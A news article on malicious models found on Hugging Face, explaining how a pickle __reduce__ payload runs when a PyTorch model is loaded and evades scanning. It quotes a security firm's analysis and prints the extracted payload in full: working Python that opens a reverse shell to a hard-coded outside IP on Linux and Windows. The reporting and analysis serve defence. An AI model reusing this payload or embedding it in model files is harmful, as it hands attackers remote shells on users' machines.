Hugging Face, the GitHub of AI, hosted code that backdoored user devices

A lab machine set up as a honeypot to observe what happened when the model was loaded.

Credit:

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Credit:

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:
RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"], 
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face joins the club

For the better part of a decade, malicious user submissions have been a fact of life for GitHub, NPM, RubyGems, and just about every other major repository of open source code. In October 2018, for instance, a package that snuck into PyPi received 171 downloads, not counting mirror sites, before researchers discovered that it contained hidden code designed to steal cryptocurrency from developer machines.